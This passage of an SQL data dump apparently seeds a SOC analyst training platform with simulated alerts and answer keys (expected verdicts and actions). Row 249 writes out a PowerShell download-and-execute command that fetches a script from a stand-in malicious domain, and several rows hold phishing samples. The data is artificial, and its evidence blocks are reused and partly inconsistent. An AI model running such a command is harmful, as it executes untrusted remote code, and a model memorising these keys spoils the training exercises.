NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(244, 'Malware Detected on Endpoint via Suspicious Process Execution', 'high', 'CrowdStrike', 'A suspicious process execution was detected on an internal machine, indicating potential malware activity. The process was associated with a known malicious hash.', 'Malware', 'T1059', 1, 'Closed', 232, '{\"timestamp\":\"2023-10-12T14:23:45Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.0.15\",\"dst_ip\":null,\"username\":\"jdoe\",\"hostname\":\"workstation-1\",\"file_hash\":\"3f5d2c7e1d4b8f9a6a7f8b2d3a4c5d6e\",\"process_name\":\"malicious.exe\"}', '2025-12-27 15:13:22', '2026-03-15 17:03:51', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the affected machine\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"3f5d2c7e1d4b8f9a6a7f8b2d3a4c5d6e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash detected in multiple malware reports\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"internal\",\"details\":\"Valid internal user account\"}}],\"expected_actions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The presence of a known malicious file hash on an internal machine, executed by a suspicious process, confirms this as a true malware incident.\"}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 
Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(245, 'Malware Detected - Suspicious Process Execution', 'high', 'CrowdStrike', 'A suspicious executable was detected running on the host, potentially indicating malware activity. The process attempted to connect to a known malicious C2 server.', 'Malware', 'T1059', 1, 'investigating', 232, '{\"timestamp\":\"2023-10-05T14:45:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.25\",\"dst_ip\":\"203.0.113.5\",\"username\":\"jdoe\",\"hostname\":\"DESKTOP-1\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\"}', '2025-12-29 00:07:31', '2026-03-15 17:12:52', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for C2 activity\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Detected as Trojan by 45 AV vendors\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised host\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The hash and external IP both have malicious indicators, confirming the detection of malware.\"}', 'Intermediate', 'EDR', 1, 0, 'OT_ICS', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc 
AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(246, 'Phishing Attempt Detected - Malicious Email Link', 'medium', 'Proofpoint', 'A phishing email was received containing a malicious link attempting to harvest credentials. The sender\'s domain is known for phishing activities.', 'Phishing', 'T1566', 1, 'investigating', 232, '{\"timestamp\":\"2023-10-05T09:30:00Z\",\"event_type\":\"email_received\",\"src_ip\":\"198.51.100.10\",\"email_sender\":\"phisher@example.com\",\"url\":\"http://malicious-site.com/login\",\"username\":\"asmith\"}', '2025-12-28 12:31:27', '2026-03-15 18:05:11', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"phisher@example.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Spamhaus\",\"verdict\":\"malicious\",\"details\":\"Domain frequently used in phishing attacks\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://malicious-site.com/login\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"Site flagged for credential phishing\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"198.51.100.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"suspicious\",\"details\":\"IP associated with spam and phishing\"}}],\"expected_actions\":[\"block_ip\",\"block_url\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"Both the sender\'s email and the URL are flagged as malicious, confirming a phishing attempt.\"}', 'Beginner', 'SIEM', 1, 0, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Phishing Attempt Detected - Malicious Email Link\",\"date\":\"2026-02-01T20:32:18.842Z\",\"x-mailer\":\"PHPMailer 
6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(247, 'Brute Force Attack Detected - Multiple Failed Logins', 'critical', 'Wazuh', 'Multiple failed login attempts detected, indicating a possible brute force attack. The source IP is from a foreign country with a history of attacks.', 'Brute Force', 'T1110', 1, 'Closed', 232, '{\"timestamp\":\"2023-10-05T17:00:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.77\",\"dst_ip\":\"192.168.1.10\",\"username\":\"administrator\",\"failed_attempts\":45}', '2025-12-28 11:20:25', '2026-03-07 14:21:36', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.77\",\"is_critical\":true,\"osint_result\":{\"source\":\"Shodan\",\"verdict\":\"malicious\",\"details\":\"IP known for brute force attack attempts\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address targeted by brute force\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"High number of failed attempts from a malicious IP confirms a brute force attack.\"}', 'Advanced', 'SIEM', 1, 0, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:18.843Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T17:00:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.77\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"administrator\\\",\\\"failed_attempts\\\":45}\"},{\"timestamp\":\"2026-02-01T20:31:18.843Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 
port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T17:00:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.77\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"administrator\\\",\\\"failed_attempts\\\":45}\"},{\"timestamp\":\"2026-02-01T20:30:18.843Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T17:00:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.77\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"administrator\\\",\\\"failed_attempts\\\":45}\"},{\"timestamp\":\"2026-02-01T20:29:18.843Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T17:00:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.77\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"administrator\\\",\\\"failed_attempts\\\":45}\"},{\"timestamp\":\"2026-02-01T20:28:18.843Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T17:00:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.77\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"administrator\\\",\\\"failed_attempts\\\":45}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(248, 'Suspicious Network Traffic - False Positive', 'low', 'Firewall', 'Network traffic was detected from a known cloud provider IP, initially flagged as suspicious. Further investigation reveals it to be legitimate.', 'Network Anomaly', 'T1071', 0, 'investigating', 232, '{\"timestamp\":\"2023-10-05T11:15:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"203.0.113.120\",\"dst_ip\":\"192.168.1.50\",\"username\":\"n/a\",\"hostname\":\"SERVER-1\"}', '2025-12-28 01:16:06', '2026-03-15 15:44:09', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.120\",\"is_critical\":false,\"osint_result\":{\"source\":\"IPInfo\",\"verdict\":\"clean\",\"details\":\"IP belongs to a reputable cloud service provider\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.50\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of a legitimate server\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"network_anomaly\",\"analysis_notes\":\"The source IP is from a legitimate cloud provider, reducing the likelihood of malicious intent.\"}', 'Beginner', 'NDR', 1, 0, 'TECH', NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(249, 'Suspicious PowerShell Command Execution Detected', 'high', 'endpoint', 'A suspicious PowerShell command that could potentially allow remote code execution or credential dumping was detected on an endpoint.', 'Execution', 'T1086', 1, 'investigating', 232, '{\"log_type\":\"process_creation\",\"timestamp\":\"2023-10-12T14:22:09Z\",\"hostname\":\"Corporate-Laptop-04\",\"username\":\"jdoe\",\"process_name\":\"powershell.exe\",\"cmdline\":\"powershell -nop -c \\\"iex (New-Object Net.WebClient).DownloadString(\'http://maliciousdomain.com/script.ps1\')\\\"\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"parent_process\":\"explorer.exe\",\"parent_process_id\":4821,\"process_id\":9342,\"integrity_level\":\"High\",\"network_activity\":[{\"protocol\":\"HTTP\",\"dest_ip\":\"192.168.1.105\",\"dest_port\":80,\"url\":\"http://maliciousdomain.com/script.ps1\"}]}', '2025-12-28 05:40:53', '2026-03-15 18:14:41', '{\"correct_verdict\":\"True Positive\",\"triage_answer\":\"Suspicious\",\"containment_answer\":\"Isolate Host\",\"scenario\":{\"ip\":\"253.135.96.33\",\"files\":[{\"name\":\"unknown_tool.ps1\",\"type\":\"script\",\"status\":\"SUSPICIOUS\"}],\"email_subject\":null}}', 'Intermediate', 'EDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(250, 'Suspicious PowerShell Command Execution Detected', 'medium', 'process', 'A PowerShell script was executed with encoded commands which is commonly used to obfuscate malicious scripts.', 'Behavioral Anomaly', 'T1086', 1, 'closed', NULL, '{\"timestamp\":\"2023-10-23T14:25:36Z\",\"host_name\":\"HR-DESKTOP-07\",\"user_name\":\"j.smith\",\"process_name\":\"powershell.exe\",\"cmdline\":\"powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand WwBy\\nYW5kb20gdGV4dF0NCmVjaG8gIlRoaXMgaXMgYSB0ZXN0LiI=\",\"file_hash\":\"3fa4cd6c63168b1eae1f3116ce3f789a175c3abe\",\"parent_process\":\"explorer.exe\",\"parent_process_id\":3452,\"process_id\":6784,\"integrity_level\":\"High\",\"src_ip\":\"192.168.10.23\",\"geo_location\":\"\",\"event_id\":4688,\"logon_type\":2}', '2025-12-28 05:25:32', '2026-02-17 22:34:47', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"61.243.64.122\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"clean\",\"details\":\"IP 61.243.64.122 has 0% abuse confidence score. Located in corporate network range.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"root\",\"is_critical\":true,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"clean\",\"details\":\"User accessed from known location during normal business hours. 
Activity consistent with role.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"suspicious_activity\"}', 'Beginner', 'EDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(251, 'Suspicious Network Activity Detected: Potential Data Exfiltration', 'high', 'network', 'Unusual outbound network activity detected, with large volumes of data being transferred to an unknown external IP address over an atypical port.', 'data_exfiltration', 'T1048: Exfiltration Over Alternative Protocol', 1, 'resolved', NULL, '{\"timestamp\":\"2023-11-01T14:23:45Z\",\"src_ip\":\"192.168.1.10\",\"dest_ip\":\"203.0.113.54\",\"src_port\":49876,\"dest_port\":8080,\"protocol\":\"TCP\",\"bytes_sent\":87000000,\"bytes_received\":1240,\"session_duration_sec\":3600,\"flags\":\"SYN,ACK\",\"geoip\":{\"country\":\"Unknown\",\"city\":\"Unknown\"},\"user_agent\":\"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)\",\"anomalies\":[\"Unusual port communication\",\"High data transfer volume\"],\"event_id\":\"net-20231101-42345\"}', '2025-12-28 05:42:26', '2026-02-01 20:32:18', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"237.158.1.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP 237.158.1.45 reported 452 times for malicious activity. 
Abuse confidence score: 86%.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"service_account\",\"is_critical\":true,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"Account shows multiple failed login attempts followed by successful authentication.\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"suspicious_activity\"}', 'Intermediate', 'SIEM', 1, 0, 'OT_ICS', NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(252, 'Successful Login with Previously Compromised Credentials', 'high', 'Authentication Logs', 'An unauthorized login attempt was detected and successfully executed using credentials associated with a known compromised email. This alert aligns with an attack pattern observed in the Acme Corp breach of August 2023, where attackers used publicly available credentials to infiltrate user accounts.', 'Credential Access', 'T1078', 1, 'resolved', 95, '{\"timestamp\":\"2023-10-11T13:45:23Z\",\"event_source\":\"Authentication Logs\",\"event_id\":\"401\",\"username\":\"j.doe@examplecorp.com\",\"ip_address\":\"192.0.2.123\",\"location\":\"Toronto, Canada\",\"login_status\":\"Success\",\"authentication_method\":\"Password\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36\",\"previous_compromise\":\"yes\",\"related_event_ids\":[\"ACME-20230815-0423\"],\"risk_score\":85,\"request_id\":\"req-123456789\"}', '2025-12-28 05:00:05', '2026-02-16 02:40:52', NULL, 'Intermediate', 'SIEM', 1, 0, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"Identity\",\"evidence\":{\"user\":{\"username\":\"jdoe\",\"display_name\":\"John Doe\",\"department\":\"Finance\",\"manager\":\"Jane Smith\"},\"risk_score\":85,\"recent_activity\":[{\"action\":\"Login Success\",\"ip\":\"10.0.0.5\",\"location\":\"New York, US\",\"time\":\"09:00 AM\"},{\"action\":\"Password Reset Request\",\"ip\":\"192.168.1.5\",\"location\":\"New York, US\",\"time\":\"09:05 AM\"},{\"action\":\"Login Failed\",\"ip\":\"203.0.113.99\",\"location\":\"Moscow, RU\",\"time\":\"02:00 AM\",\"flag\":true}]}}', 0),
(253, 'Suspicious PowerShell Execution Detected', 'high', 'CrowdStrike', 'A PowerShell script was executed on a host, which is often used by attackers to download and execute malware. Analysis revealed the script attempted to communicate with a known malicious server.', 'Malware', 'T1059', 1, 'Closed', 141, '{\"timestamp\":\"2023-10-01T14:23:45Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.101\",\"dst_ip\":\"203.0.113.45\",\"username\":\"jdoe\",\"hostname\":\"DESKTOP-1A2B3C\",\"file_hash\":\"abc123def456ghi789jkl012mno345pq\",\"domain\":\"malicious-example.com\"}', '2025-12-28 17:13:32', '2026-02-12 04:18:58', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for hosting malware\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"abc123def456ghi789jkl012mno345pq\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash found in 12 AV engines detecting it as a trojan\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.1.101\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Records\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the affected host\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The PowerShell execution with outbound connection to a known malicious IP indicates a malware attempt.\"}', 'Intermediate', 'EDR', 1, 0, 'OT_ICS', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 
Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(254, 'Credential Phishing Attempt via Email', 'critical', 'Proofpoint', 'An email was received from a spoofed domain attempting to trick users into providing credentials by clicking a malicious link.', 'Phishing', 'T1566', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-02T09:15:00Z\",\"event_type\":\"email_received\",\"src_ip\":\"198.51.100.23\",\"dst_ip\":\"10.0.0.55\",\"username\":\"asmith\",\"hostname\":\"MAILSERVER\",\"email_sender\":\"no-reply@secure-login.com\",\"url\":\"http://malicious-link.com/login\"}', '2025-12-28 17:13:32', '2026-02-01 20:32:18', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"suspicious\",\"details\":\"IP involved in multiple phishing campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://malicious-link.com/login\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL flagged for phishing attempts\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"10.0.0.55\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Records\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the email recipient\'s server\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"block_url\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The email with a known phishing URL and spoofed sender suggests a credential phishing attempt.\"}', 'Advanced', 'SIEM', 1, 0, 'OT_ICS', NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Credential Phishing Attempt via Email\",\"date\":\"2026-02-01T20:32:18.850Z\",\"x-mailer\":\"PHPMailer 
6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(255, 'Unauthorized Database Access Detected', 'high', 'database', 'Suspicious access detected on the corporate database outside of normal hours from an unrecognized IP address.', 'Anomaly Detection', 'T1078: Valid Accounts', 1, 'investigating', 54, '{\"timestamp\":\"2023-10-13T02:17:36Z\",\"event_type\":\"DB_access\",\"user\":\"jdoe\",\"access_time\":\"2023-10-13T02:16:45Z\",\"database\":\"CustomerData\",\"action\":\"SELECT\",\"affected_tables\":[\"customers\",\"orders\"],\"source_ip\":\"192.168.32.201\",\"dest_ip\":\"10.0.0.15\",\"login_status\":\"success\",\"access_method\":\"remote\",\"anomalous_activity\":true,\"notes\":\"Access outside of normal working hours (9am-6pm) by user accessing database for the first time.\"}', '2025-12-29 05:48:29', '2026-02-14 17:06:55', '{\"correct_verdict\":\"True Positive\",\"triage_answer\":\"Suspicious\",\"containment_answer\":\"Isolate Host\",\"scenario\":{\"ip\":\"216.32.48.90\",\"files\":[{\"name\":\"unknown_tool.ps1\",\"type\":\"script\",\"status\":\"SUSPICIOUS\"}],\"email_subject\":null}}', 'Intermediate', 'EDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:18.851Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-13T02:17:36Z\\\",\\\"event_type\\\":\\\"DB_access\\\",\\\"user\\\":\\\"jdoe\\\",\\\"access_time\\\":\\\"2023-10-13T02:16:45Z\\\",\\\"database\\\":\\\"CustomerData\\\",\\\"action\\\":\\\"SELECT\\\",\\\"affected_tables\\\":[\\\"customers\\\",\\\"orders\\\"],\\\"source_ip\\\":\\\"192.168.32.201\\\",\\\"dest_ip\\\":\\\"10.0.0.15\\\",\\\"login_status\\\":\\\"success\\\",\\\"access_method\\\":\\\"remote\\\",\\\"anomalous_activity\\\":true,\\\"notes\\\":\\\"Access outside of normal working hours (9am-6pm) by user accessing database for the first 
